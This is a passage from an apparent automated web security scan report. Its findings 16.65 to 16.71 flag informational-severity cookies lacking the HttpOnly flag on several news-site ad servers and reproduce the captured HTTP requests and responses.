Set-Cookie: %5FOXLIA%5B0%5D=deleted; expires=Sat, 04-Sep-2010 04:09:03 GMT; path=/
Set-Cookie: _OXLIA[185818737943]=deleted; expires=Sat, 04-Sep-2010 04:09:03 GMT; path=/
Set-Cookie: %5FOXLIA%5B185818737943%5D=deleted; expires=Sat, 04-Sep-2010 04:09:03 GMT; path=/
Set-Cookie: _OXLIA[185812323488]=deleted; expires=Sat, 04-Sep-2010 04:09:03 GMT; path=/
Set-Cookie: %5FOXLIA%5B185812323488%5D=deleted; expires=Sat, 04-Sep-2010 04:09:03 GMT; path=/
Set-Cookie: _OXLIA[59903]=deleted; expires=Sat, 04-Sep-2010 04:09:03 GMT; path=/
Set-Cookie: %5FOXLIA%5B59903%5D=deleted; expires=Sat, 04-Sep-2010 04:09:03 GMT; path=/
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=7202eec1614b307b4ef4ca8cc06d6074%5D%5D%3E%3E; expires=Mon, 03-Sep-2012 04:09:04 GMT; path=/
Set-Cookie: OXLIA=1858.deleted_0.deleted_185818737943.deleted_185812323488.deleted_59903.deleted; expires=Mon, 03-Sep-2012 04:09:04 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


16.65. http://ads.reach360ads.com/www/ads/iframe.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.reach360ads.com
Path:   /www/ads/iframe.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/ads/iframe.php HTTP/1.1
Host: ads.reach360ads.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:09:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: _OXLIA[1858]=deleted; expires=Sat, 04-Sep-2010 04:08:59 GMT; path=/
Set-Cookie: %5FOXLIA%5B1858%5D=deleted; expires=Sat, 04-Sep-2010 04:08:59 GMT; path=/
Set-Cookie: _OXLIA[0]=deleted; expires=Sat, 04-Sep-2010 04:08:59 GMT; path=/
Set-Cookie: %5FOXLIA%5B0%5D=deleted; expires=Sat, 04-Sep-2010 04:08:59 GMT; path=/
Set-Cookie: _OXLIA[185818737943]=deleted; expires=Sat, 04-Sep-2010 04:08:59 GMT; path=/
Set-Cookie: %5FOXLIA%5B185818737943%5D=deleted; expires=Sat, 04-Sep-2010 04:08:59 GMT; path=/
Set-Cookie: _OXLIA[185812323488]=deleted; expires=Sat, 04-Sep-2010 04:08:59 GMT; path=/
Set-Cookie: %5FOXLIA%5B185812323488%5D=deleted; expires=Sat, 04-Sep-2010 04:08:59 GMT; path=/
Set-Cookie: _OXLIA[59903]=deleted; expires=Sat, 04-Sep-2010 04:08:59 GMT; path=/
Set-Cookie: %5FOXLIA%5B59903%5D=deleted; expires=Sat, 04-Sep-2010 04:08:59 GMT; path=/
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=7202eec1614b307b4ef4ca8cc06d6074%5D%5D%3E%3E; expires=Mon, 03-Sep-2012 04:09:00 GMT; path=/
Set-Cookie: OXLIA=1858.deleted_0.deleted_185818737943.deleted_185812323488.deleted_59903.deleted; expires=Mon, 03-Sep-2012 04:09:00 GMT; path=/
Content-Length: 382
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...

16.66. http://ads3.bangkokpost.co.th/www/delivery/spc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads3.bangkokpost.co.th
Path:   /www/delivery/spc.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/delivery/spc.php?zones=120%3D120%7C127%3D127%7C170%3D170%7C&nz=1&source=&r=29318038&charset=UTF-8&loc=http%3A//www.bangkokpost.com/&referer=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dbangkok+thailand+news HTTP/1.1
Host: ads3.bangkokpost.co.th
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:25:04 GMT
Server: Apache/2.2.10 (Win32) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: OAID=7580d7a472c1671f0571dd788a382b2b; expires=Mon, 03-Sep-2012 02:25:04 GMT; path=/
Set-Cookie: OAID=7580d7a472c1671f0571dd788a382b2b; expires=Mon, 03-Sep-2012 02:25:04 GMT; path=/
Set-Cookie: OAID=7580d7a472c1671f0571dd788a382b2b; expires=Mon, 03-Sep-2012 02:25:04 GMT; path=/
P3P: CP="CUR ADM OUR NOR STA NID"
Content-Size: 72
Vary: User-Agent,Accept-Encoding
Content-Length: 72
Content-Type: application/x-javascript; charset=UTF-8

OA_output['120'] = '';

OA_output['127'] = '';

OA_output['170'] = '';


16.67. http://adssrv.nationmultimedia.com/adlog.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adssrv.nationmultimedia.com
Path:   /adlog.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adlog.php?bannerid=146&clientid=77&zoneid=11&source=&block=0&capping=0&cb=6482f93f24fdb883a8be35c8d503d953 HTTP/1.1
Host: adssrv.nationmultimedia.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/breakingnews/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _em_sv=-1; _cbclose32539=1; _uid32539=8467E527.1; _em_vt=f3e151deb3caa78de189b9e202024e62e18088e413-981323754e62e180; _em_v=8f239a6b9fac654b50350d7277324e62e18088e4f8-084548474e62e180; _em_hl=1; __utma=113213211.1779481420.1315103161.1315103161.1315103161.1; __utmb=113213211.1.10.1315103165; __utmc=113213211; __utmz=113213211.1315103165.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _cbclose=1; _ctout32539=1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:53:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
P3P: CP="NOI CUR ADM OUR NOR STA NID"
Set-Cookie: phpAds_capAd[137]=33148; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33149; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32361; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32362; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33150; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33151; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33152; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33153; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33154; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33155; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33156; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33157; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33158; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33159; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33160; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33161; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33162; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33163; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33164; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33165; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33166; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33167; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33168; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33169; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32363; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33170; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32364; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33171; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32365; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33172; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32366; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33173; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32367; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33174; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32368; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33175; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32369; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33176; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32370; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33177; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32371; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33178; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32372; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33179; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32373; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33180; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32374; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33181; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32375; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33182; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32376; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33183; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32377; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33184; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32378; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33185; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32379; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33186; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32380; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33187; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32381; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33188; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32382; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33189; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32383; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[137]=33190; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32384; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32385; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32386; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32387; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32388; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32389; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32390; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32391; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32392; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32393; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32394; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32395; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32396; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32397; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32398; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32399; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32400; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32401; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32402; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[49]=32403; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21926; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21927; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21928; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21929; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21930; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21931; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21932; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21933; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21934; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21935; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21936; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21937; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21938; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21939; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21940; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21941; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21942; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21943; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21944; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21945; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21946; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21947; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21948; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21949; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21950; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21951; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21952; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21953; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21954; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21955; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21956; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21957; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21958; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21959; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21960; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21961; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21962; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21963; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21964; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21965; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21966; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21967; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Set-Cookie: phpAds_capAd[153]=21968; expires=Mon, 03-Sep-2012 02:53:02 GMT; path=/
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

16.68. http://adstil.indiatimes.com/RealMedia/ads/adstream_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/13932048678/x32/OasDefault/3670000929000010THEADVER6209TOIR/Advert1x1Aug15/33323137376236613465363265316130  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/13932048678/x32/OasDefault/3670000929000010THEADVER6209TOIR/Advert1x1Aug15/33323137376236613465363265316130

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/13932048678/x32/OasDefault/3670000929000010THEADVER6209TOIR/Advert1x1Aug15/33323137376236613465363265316130? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMFD=011R02OxO106Bs; RMID=32177b6a4e62e1a0

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 02:38:57 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Cache-control: no-cache
Pragma: no-cache
Set-Cookie: RMFD=011R02aNO306Bq|O306Bs|O108EZ|O308FG|O108i0|O108ih; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.indiatimes.com
Location: http://adstil.indiatimes.com/RealMedia/ads/Creatives/default/empty.gif
Content-Type: text/html; charset=iso-8859-1
Content-Length: 328

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://adstil.indiatimes.com/RealMedia/ads/Creativ
...[SNIP]...

16.69. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:34:57 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Set-Cookie: RMFD=011R02OxO206Bs|O108EZ|O108FG|O108KY|O108i0|O108ih; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.indiatimes.com
Content-Length: 183
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<script type='text/javascript'>
var ACE_AR = {site: '800699', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>

16.70. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:00:50 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Set-Cookie: RMFD=011R02dtO206Bq|O306Bs|O108EZ|O308FG|O108i0|O108ih; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.indiatimes.com
Content-Length: 245
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<script type="text/javascript">
var CasaleArgs = new Object();
CasaleArgs.version = 2;
CasaleArgs.adUnits = "2";
CasaleArgs.casaleID = 119232;
</script>
<script type="text/javascript" src="http:
...[SNIP]...

16.71. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:01:27 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Set-Cookie: RMFD=011R02OxO306Bs|O108EZ|O108KY; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.indiatimes.com
Content-Length: 183
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<script type='text/javascript'>
var ACE_AR = {site: '800700', size: '300250'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>

